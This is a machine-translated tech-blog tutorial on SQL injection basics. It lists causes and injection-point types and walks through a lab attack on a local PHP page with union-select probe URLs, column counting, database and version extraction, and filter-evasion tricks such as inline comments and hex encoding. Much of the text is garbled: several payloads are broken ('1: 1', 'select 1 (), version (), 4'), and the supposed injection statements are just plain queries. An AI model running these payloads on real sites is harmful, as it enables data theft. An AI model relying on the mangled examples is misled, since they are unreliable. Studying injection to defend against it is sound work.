Shulou(Shulou.com)06/01 Report--

This article introduces you what is the basis of sql injection vulnerabilities, the content is very detailed, interested friends can refer to, hope to be helpful to you.

I. brief introduction

SQL injection is to trick the server into executing malicious SQL commands by inserting SQL commands into the Web form to submit or enter the query string of the domain name or page request.

Second, the causes

1. When the program is developed, it does not filter the user's data and treats the user's data as trusted data.

two。 The filtering is not strict.

3. The database is not properly configured.

4. Improper escape.

III. Classification of injection points

1. Digital injection:

On the Web side, it is probably in the form of http://www.aiyou.com/news.php?id=1, and its injection point id type is numeric, so it is called numeric injection point. The prototype of this type of SQL statement is probably the select * from table name where id=1. The combined sql injection statement is: select * from news where id=1

2. Character injection:

It is probably in the form of http://www.aiyou.com/news.php?name=aiyou on the Web side, and the name type of the injection point is a character type, so it is called a character injection point. The prototype of this type of SQL statement is probably the select * from table name where name='aiyou'. Pay attention to too many quotation marks. The combined sql injection statement is: select * from news where name='admin'

3. Search injection:

On the Web side, it is probably in the form of http://www.aiyou.com/news.php?keyword=aiyou, and its prototype is roughly as follows: the select * from table name where field like'% aiyou%', combines the sql injection statement: select * from news where search like'% aiyou%'

IV. Digital examples

1. Create a php page that queries albums based on id

2. Visit: http://192.168.1.129/php/szx.php?id=1

3. Test whether the injection exists

Http://192.168.1.129/php/szx.php?id=1 and 1: 1 returns to normal

Http://192.168.1.129/php/szx.php?id=1 and 1: 2 returned an error

Existential injection

4. Determine the number of columns in the table

Http://192.168.1.129/php/szx.php?id=1 order by 5 returned an error

Http://192.168.1.129/php/szx.php?id=1 order by 4 returned to normal

The table has four columns

5. Joint query

Http://192.168.1.129/php/szx.php?id=-1 union select 1,2,3,4

6. Get the database name and mysql version number

Http://192.168.1.129/php/szx.php?id=-1 union select 1 (), version (), 4

5. Features of mysql5.0 and above:

Define information_schema database by default, with table schemata (database name), tables (table name), columns (column name or field name)

In the schemata table, the schema_name field is used to store the database name

In the tables table, table_schema and table_name are used to store database names and table names, respectively.

In the columns table, tabel_schema stores the database name, table_name storage table name, and column_name storage field name

Note:

1. The case in Mysql is not sensitive, and the case is the same.

2. Both hexadecimal and URL codes in Mysql can be recognized.

3. Replace and--&& or-- with symbols and keywords |, and takes precedence over or

4. Inline comments / *! Inline comment * /, / *! / *! * / is equivalent to / *! * /

On the basis of sql injection vulnerabilities what is shared here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.